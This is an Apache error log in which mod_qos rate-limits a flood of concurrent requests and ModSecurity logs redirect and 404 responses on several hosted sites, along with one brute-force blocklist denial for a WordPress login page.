[Tue May 26 19:59:39.031394 2026] [qos:error] [pid 93868:tid 94352] [client 45.148.10.120:34982] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259EAAAAe0
[Tue May 26 19:59:39.163451 2026] [qos:error] [pid 93868:tid 94378] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259EgAAAgc
[Tue May 26 19:59:39.171121 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzSAAAAEA
[Tue May 26 19:59:39.172230 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259EwAAAZE
[Tue May 26 19:59:39.175642 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzSQAAAGg
[Tue May 26 19:59:39.178519 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:34982] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259FAAAAdM
[Tue May 26 19:59:39.178552 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzSgAAABg
[Tue May 26 19:59:39.184615 2026] [qos:error] [pid 93868:tid 94338] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259FQAAAd8
[Tue May 26 19:59:39.184828 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzSwAAAFs
[Tue May 26 19:59:39.187257 2026] [security2:error] [pid 93576:tid 93607] [remote 50.6.207.27:49478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuUmDRMqfxdEDkoszzRgAAIxw"]
[Tue May 26 19:59:39.189636 2026] [qos:error] [pid 93868:tid 94287] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259FgAAAaw
[Tue May 26 19:59:39.193290 2026] [qos:error] [pid 93868:tid 94298] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259FwAAAbc
[Tue May 26 19:59:39.275007 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QqAAAAJU"]
[Tue May 26 19:59:39.278366 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QiAAAAJ0"]
[Tue May 26 19:59:39.282856 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QwQAAAM8"]
[Tue May 26 19:59:39.284028 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QrgAAAMA"]
[Tue May 26 19:59:39.286709 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QxwAAAMg"]
[Tue May 26 19:59:39.290334 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QvwAAAKU"]
[Tue May 26 19:59:39.293957 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QvgAAAN8"]
[Tue May 26 19:59:39.297780 2026] [security2:error] [pid 106517:tid 106658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QwwAAAI0"]
[Tue May 26 19:59:39.298553 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QwAAAALk"]
[Tue May 26 19:59:39.302368 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUUqK9k_ZUB2Vp258lwAAAfk"]
[Tue May 26 19:59:39.306959 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUUqK9k_ZUB2Vp258lgAAAa8"]
[Tue May 26 19:59:39.307686 2026] [security2:error] [pid 106517:tid 106688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QxAAAAKo"]
[Tue May 26 19:59:39.313632 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUUqK9k_ZUB2Vp258lQAAAeg"]
[Tue May 26 19:59:39.314860 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QywAAALg"]
[Tue May 26 19:59:39.316283 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUUqK9k_ZUB2Vp258lAAAAdQ"]
[Tue May 26 19:59:39.323329 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QzwAAAI4"]
[Tue May 26 19:59:39.334815 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QyQAAAPQ"]
[Tue May 26 19:59:39.339234 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp258wgAAAak"]
[Tue May 26 19:59:39.347373 2026] [security2:error] [pid 106517:tid 106694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QyAAAALA"]
[Tue May 26 19:59:39.347878 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1Q2wAAANI"]
[Tue May 26 19:59:39.350098 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp258wQAAAfE"]
[Tue May 26 19:59:39.378864 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp258wwAAAcY"]
[Tue May 26 19:59:39.388305 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2581AAAAfc"]
[Tue May 26 19:59:39.392656 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzGQAAAAU"]
[Tue May 26 19:59:39.394054 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzGwAAAAA"]
[Tue May 26 19:59:39.394612 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzFQAAAGQ"]
[Tue May 26 19:59:39.395952 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp258xAAAAd4"]
[Tue May 26 19:59:39.407595 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2581wAAAZU"]
[Tue May 26 19:59:39.409473 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp258ygAAAa4"]
[Tue May 26 19:59:39.410674 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp258xwAAAeI"]
[Tue May 26 19:59:39.414326 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2582gAAAZs"]
[Tue May 26 19:59:39.414992 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzFgAAAFI"]
[Tue May 26 19:59:39.427488 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzGgAAAEc"]
[Tue May 26 19:59:39.431750 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2583QAAAcs"]
[Tue May 26 19:59:39.434568 2026] [security2:error] [pid 106517:tid 106691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUoZZc2DoU1lPnP1Q9gAAAK0"]
[Tue May 26 19:59:39.443188 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUmDRMqfxdEDkoszzHQAAAHY"]
[Tue May 26 19:59:39.453320 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUkqK9k_ZUB2Vp2584AAAAaY"]
[Tue May 26 19:59:39.610113 2026] [qos:error] [pid 106517:tid 106755] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuU4ZZc2DoU1lPnP1RRgAAAO0
[Tue May 26 19:59:39.610997 2026] [qos:error] [pid 106517:tid 106748] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=100, c=50.87.254.159, id=ahWuU4ZZc2DoU1lPnP1RSAAAAOY
[Tue May 26 19:59:39.611675 2026] [qos:error] [pid 106517:tid 106663] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuU4ZZc2DoU1lPnP1RRwAAAJI
[Tue May 26 19:59:39.614469 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuU4ZZc2DoU1lPnP1RSgAAAMQ
[Tue May 26 19:59:39.614663 2026] [qos:error] [pid 93868:tid 94364] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuU0qK9k_ZUB2Vp259QgAAAfk
[Tue May 26 19:59:39.615590 2026] [qos:error] [pid 106517:tid 106760] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuU4ZZc2DoU1lPnP1RSwAAAPI
[Tue May 26 19:59:39.615731 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuU0qK9k_ZUB2Vp259RQAAAdE
[Tue May 26 19:59:39.615972 2026] [qos:error] [pid 93868:tid 94295] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuU0qK9k_ZUB2Vp259SgAAAbQ
[Tue May 26 19:59:39.616157 2026] [qos:error] [pid 93868:tid 94327] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuU0qK9k_ZUB2Vp259SQAAAdQ
[Tue May 26 19:59:39.764926 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzdQAAACs
[Tue May 26 19:59:39.765287 2026] [qos:error] [pid 93868:tid 94367] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259UQAAAfw
[Tue May 26 19:59:39.766221 2026] [qos:error] [pid 93868:tid 94371] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259UgAAAgA
[Tue May 26 19:59:39.768477 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzdgAAACw
[Tue May 26 19:59:39.768754 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzeAAAABQ
[Tue May 26 19:59:39.768768 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzdwAAAEA
[Tue May 26 19:59:39.769660 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzeQAAAGg
[Tue May 26 19:59:39.771379 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259UwAAAeM
[Tue May 26 19:59:39.771984 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzegAAABg
[Tue May 26 19:59:39.772234 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259VAAAAeM
[Tue May 26 19:59:39.916226 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259WgAAAZU
[Tue May 26 19:59:39.917144 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzewAAAFk
[Tue May 26 19:59:39.918120 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzfAAAAD0
[Tue May 26 19:59:39.918805 2026] [qos:error] [pid 93868:tid 94377] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259WwAAAgY
[Tue May 26 19:59:39.920534 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzfQAAAH8
[Tue May 26 19:59:39.922811 2026] [qos:error] [pid 93868:tid 94274] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259XAAAAZ8
[Tue May 26 19:59:39.923165 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzfgAAAHs
[Tue May 26 19:59:39.926837 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259XQAAAdc
[Tue May 26 19:59:39.927389 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzfwAAABE
[Tue May 26 19:59:39.946009 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzgAAAAEo
[Tue May 26 19:59:40.065990 2026] [qos:error] [pid 93868:tid 94329] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259YgAAAdY
[Tue May 26 19:59:40.068447 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzggAAAFo
[Tue May 26 19:59:40.069164 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzgwAAAAw
[Tue May 26 19:59:40.070294 2026] [qos:error] [pid 93868:tid 94369] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259YwAAAf4
[Tue May 26 19:59:40.071590 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzhAAAACI
[Tue May 26 19:59:40.074516 2026] [qos:error] [pid 93868:tid 94286] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259ZAAAAas
[Tue May 26 19:59:40.076829 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzhQAAACA
[Tue May 26 19:59:40.081702 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzhgAAAGY
[Tue May 26 19:59:40.083486 2026] [qos:error] [pid 93868:tid 94351] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259ZQAAAew
[Tue May 26 19:59:40.096024 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVGDRMqfxdEDkoszzhwAAAEQ
[Tue May 26 19:59:40.102556 2026] [security2:error] [pid 106517:tid 106677] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RUgAAAKA"]
[Tue May 26 19:59:40.216328 2026] [qos:error] [pid 93868:tid 94376] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVEqK9k_ZUB2Vp259agAAAgU
